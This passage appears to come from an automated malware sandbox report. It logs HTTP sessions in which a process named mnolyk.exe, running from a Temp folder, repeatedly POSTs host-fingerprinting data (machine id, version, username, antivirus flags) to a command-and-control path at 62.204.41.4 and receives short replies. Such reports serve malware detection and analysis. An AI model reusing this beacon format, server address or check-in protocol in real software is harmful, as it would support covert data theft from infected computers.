                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:01.373136997 CET156INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          430192.168.2.65015462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:56.574090004 CET578OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:56.637090921 CET578INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          431192.168.2.65015562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:56.813184023 CET579OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:56.876737118 CET579INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          432192.168.2.65015662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:57.043867111 CET580OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:57.110049009 CET580INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          433192.168.2.65015762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:57.285145044 CET581OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:57.349086046 CET581INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          434192.168.2.65015862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:57.529246092 CET582OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:57.593482971 CET582INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          435192.168.2.65015962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:57.764940977 CET583OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:57.828329086 CET583INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          436192.168.2.65016062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:58.000083923 CET584OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:58.066256046 CET584INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          437192.168.2.65016162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:58.254041910 CET585OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:58.319019079 CET585INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          438192.168.2.65016262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:58.501955032 CET586OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:58.565460920 CET586INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          439192.168.2.65016362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:58.736660957 CET587OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:58.802519083 CET587INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          44192.168.2.64976362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:01.550107002 CET157OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:01.612922907 CET157INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          440192.168.2.65016462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:58.984888077 CET588OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:59.050481081 CET588INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          441192.168.2.65016562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:59.233845949 CET589OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:59.298787117 CET589INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          442192.168.2.65016662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:59.478158951 CET590OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:59.541083097 CET590INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          443192.168.2.65016762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:59.715668917 CET591OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:59.780316114 CET591INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          444192.168.2.65016862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:59.953138113 CET592OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:00.018917084 CET592INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          445192.168.2.65016962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:00.200664997 CET592OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:00.265571117 CET593INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          446192.168.2.65017062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:00.433374882 CET593OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:00.494765043 CET594INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          447192.168.2.65017162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:00.685944080 CET594OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:00.749867916 CET595INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          448192.168.2.65017262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:00.921461105 CET595OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:00.986504078 CET596INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          449192.168.2.65017362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:01.155358076 CET597OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
